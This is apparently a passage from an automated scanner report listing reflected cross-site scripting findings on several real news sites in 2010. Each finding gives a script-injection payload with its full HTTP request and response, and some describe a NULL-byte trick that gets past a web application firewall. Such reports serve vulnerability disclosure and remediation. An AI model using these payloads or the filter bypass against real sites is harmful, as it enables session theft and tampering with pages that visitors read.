2.358. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.networkworld.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf22b'-alert(1)-'37d290c00bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?bf22b'-alert(1)-'37d290c00bd=1 HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Expires: Thu, 16 Dec 2010 13:36:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 16 Dec 2010 13:36:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292506592736317; path=/; expires=Sat, 15-Dec-12 13:36:32 GMT Content-Length: 214743
2.359. http://www.pcadvisor.co.uk/news/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pcadvisor.co.uk
Path:
/news/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69011"><script>alert(1)</script>9de57f216aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/index.cfm?newsid=3253825&rss&69011"><script>alert(1)</script>9de57f216aa=1 HTTP/1.1 Host: www.pcadvisor.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 13:36:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25969891;expires=Sat, 08-Dec-2040 13:36:48 GMT;path=/ Set-Cookie: CFTOKEN=e585d5aa820ec83e-EF65B19A-1EC9-D5E4-1078FEB614A0F34A;expires=Sat, 08-Dec-2040 13:36:48 GMT;path=/ Set-Cookie: JSESSIONID=d230e6d6fe3c111160ed451f7a7b7a3a5c10;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the rss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5723"><script>alert(1)</script>8cec92d4daf was submitted in the rss parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/index.cfm?newsid=3253825&rssc5723"><script>alert(1)</script>8cec92d4daf HTTP/1.1 Host: www.pcadvisor.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 16 Dec 2010 13:36:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=25969888;expires=Sat, 08-Dec-2040 13:36:45 GMT;path=/ Set-Cookie: CFTOKEN=ac5f30b92fefe84f-EF65A46C-1EC9-D5E4-10097E4FE62FF2EF;expires=Sat, 08-Dec-2040 13:36:45 GMT;path=/ Set-Cookie: JSESSIONID=d2309f8d5e6d79efe173136f1f5c65394658;path=/ Content-Language: en-GB Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 323b5"><a>3b18e4e2d30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html323b5"><a>3b18e4e2d30 HTTP/1.1 Host: www.pcw.gr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.5.33 Date: Thu, 16 Dec 2010 13:37:07 GMT Content-Type: text/html; charset=ISO-8859-7 Connection: close Set-Cookie: PHPSESSID=f3e06ea129947e25d080d013bd0ae752; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 108285
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7"> <title ...[SNIP]... <a href="http://del.icio.us/post?http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html323b5"><a>3b18e4e2d30"> ...[SNIP]...
2.362. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708ff"><script>alert(1)</script>7ecb38db66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html?708ff"><script>alert(1)</script>7ecb38db66b=1 HTTP/1.1 Host: www.pcw.gr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.5.33 Date: Thu, 16 Dec 2010 13:36:55 GMT Content-Type: text/html; charset=ISO-8859-7 Connection: close Set-Cookie: PHPSESSID=39a9fd97ec0d33669b3c59b960c95214; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 110688
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-7"> <title ...[SNIP]... <a href="http://del.icio.us/post?http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html?708ff"><script>alert(1)</script>7ecb38db66b=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38c42<a%20b%3dc>f35e1c5047 was submitted in the REST URL parameter 2. This input was echoed as 38c42<a b=c>f35e1c5047 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /notizia/12081738c42<a%20b%3dc>f35e1c5047/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html HTTP/1.1 Host: www.pcworld.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:36:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=m951f9k65hl0pogrkf4stam5k6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1029 Connection: close Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9911f"><script>alert(1)</script>176e5d70aaa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /notizia/120817/2010-12-169911f"><script>alert(1)</script>176e5d70aaa/LG-Optimus-2X-il-primo-smartphone-dual-core.html HTTP/1.1 Host: www.pcworld.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:37:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=ah484ppadmg4ltlefiku23nbo3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>LG Optimus 2X, il p ...[SNIP]... <link rel="canonical" href="http://www.pcworld.it/notizia/120817/2010-12-169911f"><script>alert(1)</script>176e5d70aaa/LG-Optimus-2X-il-primo-smartphone-dual-core.html" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0ae"><script>alert(1)</script>64ba604f6dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html3a0ae"><script>alert(1)</script>64ba604f6dd HTTP/1.1 Host: www.pcworld.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:37:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Set-Cookie: PHPSESSID=ic5qa3nv615i8n801523do1c93; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 38683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>LG Optimus 2X, il p ...[SNIP]... <link rel="canonical" href="http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html3a0ae"><script>alert(1)</script>64ba604f6dd" /> ...[SNIP]...
2.366. http://www.plasticsnews.com/china/english/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.plasticsnews.com
Path:
/china/english/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1b4"><script>alert(1)</script>7f8f83498ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /china/english/?9e1b4"><script>alert(1)</script>7f8f83498ba=1 HTTP/1.1 Host: www.plasticsnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:36:40 GMT Server: Apache/2.2.0 (Fedora) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36735
2.367. http://www.publish2.com/contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.publish2.com
Path:
/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008a412"><script>alert(1)</script>834a1042c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a412"><script>alert(1)</script>834a1042c16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /contact?%008a412"><script>alert(1)</script>834a1042c16=1 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/ Set-Cookie: kohanasession=48i45fdh098dp2cb0lffk21cs3; path=/ Set-Cookie: kohanasession=48i45fdh098dp2cb0lffk21cs3; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI0OGk0NWZkaDA5OGRwMmNiMGxmZmsyMWNzMyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNTs%3D; path=/ Content-Length: 7095 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <form id="contactGeneral" method="post" action="http://www.publish2.com/contact?%008a412"><script>alert(1)</script>834a1042c16=1"> ...[SNIP]...
2.368. http://www.publish2.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.publish2.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006a091"><script>alert(1)</script>ff942affee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a091"><script>alert(1)</script>ff942affee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /login?%006a091"><script>alert(1)</script>ff942affee7=1 HTTP/1.1 Host: www.publish2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:16:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/ Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/ Set-Cookie: kohanasession=nbeoje320ud00u58pjejkuohi3; path=/ Set-Cookie: kohanasession=nbeoje320ud00u58pjejkuohi3; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJuYmVvamUzMjB1ZDAwdTU4cGplamt1b2hpMyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNTs%3D; path=/ Content-Length: 5503 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <form method="post" action="http://www.publish2.com/login?%006a091"><script>alert(1)</script>ff942affee7=1"> ...[SNIP]...
The value of the callback request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f93f2"><script>alert(1)</script>f7e2eb1550e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065f93f2"><script>alert(1)</script>f7e2eb1550e HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:15:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:47 GMT; path=/ Set-Cookie: kohanasession=op3nnnpqjgr1hela4rskhf33p2; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJvcDNubm5wcWpncjFoZWxhNHJza2hmMzNwMiI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNDg7; path=/ Content-Length: 7840 Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="button RSS" href="/search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065f93f2"><script>alert(1)</script>f7e2eb1550e"> ...[SNIP]...
2.370. http://www.publish2.com/search/links [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.publish2.com
Path:
/search/links
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055565"><script>alert(1)</script>3d327ec153a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55565"><script>alert(1)</script>3d327ec153a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%0055565"><script>alert(1)</script>3d327ec153a=1 HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:15:53 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:15:52 GMT; path=/ Set-Cookie: kohanasession=8kv08e6eh1qe1n2g4mtn088lq3; path=/ P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI4a3YwOGU2ZWgxcWUxbjJnNG10bjA4OGxxMyI7dG90YWxfaGl0c3xpOjM7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNTM7; path=/ Content-Length: 7614 Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <a class="button RSS" href="/search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065&%0055565"><script>alert(1)</script>3d327ec153a=1"> ...[SNIP]...
The value of the number_of_items request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d376"><script>alert(1)</script>55c0ff8b4ca was submitted in the number_of_items parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/links?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=54d376"><script>alert(1)</script>55c0ff8b4ca&callback=jsonp1292504943065 HTTP/1.1 Host: www.publish2.com Proxy-Connection: keep-alive Referer: http://www.buzzmachine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTY7
Response
